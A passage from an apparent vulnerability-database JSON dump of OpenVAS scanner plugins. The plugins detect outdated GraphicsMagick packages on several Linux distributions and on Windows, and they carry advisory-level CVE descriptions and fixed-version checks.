respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891401\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\", \"CVE-2016-5241\", \"CVE-2016-7446\",\n \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\", \"CVE-2017-11636\", \"CVE-2017-11643\",\n \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\",\n \"CVE-2017-14314\", \"CVE-2017-14733\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17498\",\n \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\",\n \"CVE-2017-17912\", \"CVE-2017-17915\");\n script_name(\"Debian LTS: Security Advisory for graphicsmagick (DLA-1401-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-10 00:00:00 +0200 (Tue, 10 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n 
script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_tag(name:\"summary\", value:\"Various security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.20-3+deb8u3\", 
rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++3\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick3\", ver:\"1.3.20-3+deb8u3\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-29T20:09:20", "description": "The NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.", "cvss3": {}, "published": "2018-01-09T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for graphicsmagick (DLA-1231-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-17782", "CVE-2017-17503", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17912"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891231", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891231", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even 
the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891231\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17912\", \"CVE-2017-17915\");\n script_name(\"Debian LTS: Security Advisory for graphicsmagick (DLA-1231-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-09 00:00:00 +0100 (Tue, 09 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00005.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"graphicsmagick on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\");\n\n script_tag(name:\"summary\", value:\"The NSFocus Security Team discovered multiple security issues 
in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial-of-service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-dbg\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-imagemagick-compat\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick-libmagick-dev-compat\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphics-magick-perl\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++1-dev\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick++3\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick1-dev\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick3\", ver:\"1.3.16-1.1+deb7u16\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:21:46", "description": "This host is installed with GraphicsMagick\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-02-21T00:00:00", "type": "openvas", 
"title": "GraphicsMagick Multiple Vulnerabilities-01 Feb17 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7446", "CVE-2016-7449"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810560", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810560", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# GraphicsMagick Multiple Vulnerabilities-01 Feb17 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:graphicsmagick:graphicsmagick\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810560\");\n script_version(\"2019-07-05T10:41:31+0000\");\n script_cve_id(\"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\");\n script_bugtraq_id(93074);\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:41:31 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-02-21 10:39:33 +0530 (Tue, 21 Feb 2017)\");\n script_name(\"GraphicsMagick Multiple Vulnerabilities-01 Feb17 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with GraphicsMagick\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists as,\n\n - The TIFF reader had a bug pertaining to use of 'TIFFGetField' function when\n a 'count' value is returned.\n\n - The Utah RLE reader did not validate that header information was\n reasonable given the file size.\n\n - A heap overflow error in the 'EscapeParenthesis' function.\n\n - A buffer overflow error in the MVG and SVG rendering code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a heap read overflow which could allow an untrusted file to\n crash the software, cause huge memory allocations and/or consume huge amounts\n of CPU, cause a denial of service and to have some 
unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"GraphicsMagick version before 1.3.25\n on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to GraphicsMagick version 1.3.25\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2016/08/23/graphicsmagick-two-heap-based-buffer-overflow-in-readtiffimage-tiff-c\");\n script_xref(name:\"URL\", value:\"https://blogs.gentoo.org/ago/2016/09/07/graphicsmagick-null-pointer-dereference-in-magickstrlcpy-utility-c\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/09/18/8\");\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q3/550\");\n\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_graphicsmagick_detect_win.nasl\");\n script_mandatory_keys(\"GraphicsMagick/Win/Installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!gmVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:gmVer, test_version:\"1.3.25\"))\n{\n report = report_fixed_ver(installed_version:gmVer, fixed_version:\"1.3.25\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T22:56:18", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-752)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7446", "CVE-2016-7449"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120741", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120741", 
"sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120741\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:27 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-752)\");\n script_tag(name:\"insight\", value:\"A possible heap overflow was discovered in the EscapeParenthesis() function (CVE-2016-7447 ).Various issues were found in the processing of SVG files in GraphicsMagick (CVE-2016-7446 ).The TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. 
The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software (CVE-2016-7449 ).The Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU, causing a denial of service (CVE-2016-7448 )\");\n script_tag(name:\"solution\", value:\"Run yum update GraphicsMagick to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-752.html\");\n script_cve_id(\"CVE-2016-7447\", \"CVE-2016-7446\", \"CVE-2016-7449\", \"CVE-2016-7448\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-c++-devel\", rpm:\"GraphicsMagick-c++-devel~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-devel\", rpm:\"GraphicsMagick-devel~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-c++\", rpm:\"GraphicsMagick-c++~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-perl\", rpm:\"GraphicsMagick-perl~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-debuginfo\", rpm:\"GraphicsMagick-debuginfo~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"GraphicsMagick-doc\", rpm:\"GraphicsMagick-doc~1.3.25~1.9.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-23T16:32:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Ubuntu Update for graphicsmagick USN-4248-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17783", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-17782", "CVE-2017-17503", "CVE-2017-16547", "CVE-2017-17500", "CVE-2017-16669", "CVE-2017-16545", "CVE-2017-17501"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562310844305", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310844305", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.844305\");\n script_version(\"2020-01-23T07:59:05+0000\");\n script_cve_id(\"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 07:59:05 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 04:00:25 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Ubuntu Update for graphicsmagick USN-4248-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"4248-1\");\n script_xref(name:\"URL\", value:\"https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-January/005283.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'graphicsmagick'\n package(s) announced via the USN-4248-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that GraphicsMagick incorrectly handled certain image files.\nAn attacker could possibly use this issue to 
cause a denial of service or other\nunspecified impact.\");\n\n script_tag(name:\"affected\", value:\"'graphicsmagick' package(s) on Ubuntu 16.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU16.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"graphicsmagick\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"-q16-12\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"libgraphicsmagick-q16-3\", ver:\"1.3.23-1ubuntu0.5\", rls:\"UBUNTU16.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-02-01T00:00:00", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17783", "CVE-2017-17915", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13147", "CVE-2017-11636", "CVE-2017-17782", "CVE-2017-11102", "CVE-2017-11643", "CVE-2017-11139", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-11140", "CVE-2017-17912", "CVE-2017-11637"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874084", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# 
$Id: gb_fedora_2018_7c61d08c4f_GraphicsMagick_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874084\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-01 07:56:43 +0100 (Thu, 01 Feb 2018)\");\n script_cve_id(\"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-17783\",\n \"CVE-2017-17782\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-13147\",\n \"CVE-2017-11643\", \"CVE-2017-11641\", \"CVE-2017-11636\", \"CVE-2017-11637\",\n \"CVE-2017-11140\", \"CVE-2017-11139\", \"CVE-2017-11102\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for GraphicsMagick FEDORA-2018-7c61d08c4f\");\n script_tag(name:\"summary\", value:\"The remote host is missing 
an update for the 'GraphicsMagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"GraphicsMagick on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7c61d08c4f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M7ZZRPUL2DNIAIFTNGOFAV2VTBMMSRXA\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"GraphicsMagick\", rpm:\"GraphicsMagick~1.3.28~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:11", "description": "The remote host is missing an update for the 'GraphicsMagick'\n package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2018-02-01T00:00:00", "type": "openvas", "title": "Fedora Update for GraphicsMagick FEDORA-2018-bfb9835edd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17783", "CVE-2017-17915", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13147", "CVE-2017-11636", "CVE-2017-17782", "CVE-2017-11102", "CVE-2017-11643", "CVE-2017-11139", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-11140", "CVE-2017-17912", "CVE-2017-11637"], "modified": 
